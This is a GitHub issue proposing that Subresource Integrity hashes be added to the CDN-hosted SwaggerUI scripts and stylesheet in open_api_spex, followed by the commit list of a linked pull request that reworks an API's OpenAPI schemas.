Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Adding "integrity" to CDN-based resources (JS/CSS), thoughts? #559

Open
thbar opened this issue Aug 28, 2023 · 0 comments
Open

Adding "integrity" to CDN-based resources (JS/CSS), thoughts? #559

thbar opened this issue Aug 28, 2023 · 0 comments

Comments

@thbar
Copy link
Contributor

thbar commented Aug 28, 2023

While checking the version of SwaggerUI I noticed that the plug which specifies the JS/CSS resources relies on a CDN, but the integrity (https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity) is not currently checked:

open_api_spex/lib/open_api_spex/plug/swagger_ui.ex

Line 43 in c1dbca1

<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/swagger-ui/4.14.0/swagger-ui.css" >

open_api_spex/lib/open_api_spex/plug/swagger_ui.ex

Lines 69 to 70 in c1dbca1

<script src="https://cdnjs.cloudflare.com/ajax/libs/swagger-ui/4.14.0/swagger-ui-bundle.js" charset="UTF-8"> </script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/swagger-ui/4.14.0/swagger-ui-standalone-preset.js" charset="UTF-8"> </script>

In case of resource compromise on the CDN, this would make arbitrary execution of JS on the main Phoenix app (since the plug is most of the time, I think, served from the same domain).

It would be worthwhile to add integrity to the resource (see https://stackoverflow.com/a/49061277/20302).

I wonder if a more flexible approach to let version/integrity be provided by the user of OpenAPISpex could be better.

Let me know what you think!
thbar added a commit to etalab/transport-site that referenced this issue Aug 28, 2023
@thbar
Add note about SwaggerUI version
4607bfc 
See open-api-spex/open_api_spex#559
github-merge-queue bot pushed a commit to etalab/transport-site that referenced this issue Sep 4, 2023
@thbar @AntoineAugusti
Reprise en main de la documentation API (Swagger) (#3351)
d8c1c89 
* Change case to reflect current branding

* Improve description

* Fix AOM API schema (#3350)

* Run mix format

* Fix community_resources.updated

* Fix more datasets spec

* Update schemas.ex

* Fix format

* Add assert_schema on datasets list operation

* Fix /api/datasets specification

We now properly report the response to be an array of Datasets, instead of a single Dataset.

* Rename operation response (unsure of the impact)

* Update documentation for datasets operation

* Add more assert_schema

* Achieve more assert schemas

* Fix Dialyzer issues (#3397)

* Fix credo warning

* Add missing data required for API output

See:
- #3396
- #3399

* Make .aom.siren officially nullable

See:
- #3396

This will fix tests and make sure to reflect the actual production data.

* Group operations together on the swagger UI

* Update doc to reflect reality

* Add TODO

* Add one aom test at least

* Fix test

* Fix & modernize AOM specs (#3401)

* Start fixing Resource & CommunityResource specs

* Fix Autocomplete spec & add assert_schema

* Start fixing Dataset spec

* Update stats_controller_test.exs

* Add notes about conversions

* Add TODO

* Remove unused import

* Add TODO

* Add req in dev for scripting

Required because I now run some scripts with `mix run` to get the full app env.

* Format

* Create .gitignore

* Format

* Remove sometimes unseen field to reflect API behaviour

* Format

* Format

* Format

* Add missing schema_version

* Format

* Format

* Temporary allow community resources here (#3407)

* Start fixing CoveredArea (just country case for now)

* Save WIP script used to validate current production data against local OpenAPI spec

* Remove TODO

* Add CoveredArea.Region and CoveredArea.AOM

* Advertise behaviour #3408

* Add CoveredArea.Cities

* Enforce type value for covered areas

* Enforce type field value for Region

* Remove bogus property

* Format

* Fix broken cities schema

* Refactor dataset spec

Improvements:
- extract spec so that history is not allowed in the summarized view
- make all keys required with an opt-out option

* Emphasize this specific response is summarized a bit

* Remove all "nullable: false" (since this is the default)

* Introduce summarized vs detailed Resource

* Improve GeoJSON / NeTEx checks

* Set properties for community & regular resources

* Format

* Remove todo (won't do that)

* Fix optional properties

* Download all the datasets JSON

* Improve dataset details spec

* Remove TODO

* Verify Resource properties

* Allow direct "./scripts/api/spec_check.exs" invoke from shell

* Increase timeout

* Refactor tests for clarity

* Disable highlight to fix SwaggerUI hanging in browser on large payloads (#3421)

* Add note about SwaggerUI version

See open-api-spex/open_api_spex#559

* Add useful links

* Mix format

* Add obsolete note

* Fix wording

* Remove comment which applies everywhere

* Require all by default

* Improve factories for required data (for tests to pass)

Related:
- #3399

* Improve wording

* Fix broken specs

* Fix broken specs

* Fix broken assertion

* Fix broken spec

* Add extra assert_schema

* Apply routing related match error fix

* Enforce additionalProperties: false for all detected schemas with type object

* Run mix format

* DRY optional keys & remove TODO

* Fix credo warning

* Fix credo warning

* Fix credo warning

* Fix typo

* Start verifying feature collections

* Allow extra property for GeometryBase

* Remove unused import

* Fix (I think) Polygon to make tests pass

* Move id to the right place

* Add missing type

* DRY things a bit

* Add quiet TODO

* Add note

* Remove TODO (this is not correct)

* Add note

* Specify history & remove TODO

* Remove TODO (will put it in the description of the PR)

* Fix incorrect note

* Fix broken link

* Add note

* Update schemas.ex

* Mix format

* Improve texts

* Mix format

* Update apps/transport/lib/transport_web/api/controllers/places_controller.ex

Co-authored-by: Antoine Augusti <antoine.augusti@transport.data.gouv.fr>

* Update apps/transport/lib/transport_web/api/schemas.ex

Co-authored-by: Antoine Augusti <antoine.augusti@transport.data.gouv.fr>

* Update apps/transport/lib/transport_web/api/schemas.ex

Co-authored-by: Antoine Augusti <antoine.augusti@transport.data.gouv.fr>

* Update apps/transport/test/support/factory.ex

Co-authored-by: Antoine Augusti <antoine.augusti@transport.data.gouv.fr>

* Update apps/transport/test/transport_web/controllers/api/schemas_test.exs

Co-authored-by: Antoine Augusti <antoine.augusti@transport.data.gouv.fr>

* Update apps/transport/test/transport_web/controllers/api/schemas_test.exs

Co-authored-by: Antoine Augusti <antoine.augusti@transport.data.gouv.fr>

* Update apps/transport/lib/transport_web/api/spec.ex

Co-authored-by: Antoine Augusti <antoine.augusti@transport.data.gouv.fr>

* Add note

* Update apps/transport/test/transport_web/controllers/api/stats_controller_test.exs

Co-authored-by: Antoine Augusti <antoine.augusti@transport.data.gouv.fr>

* Fix broken test

---------

Co-authored-by: Antoine Augusti <antoine.augusti@transport.data.gouv.fr>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@thbar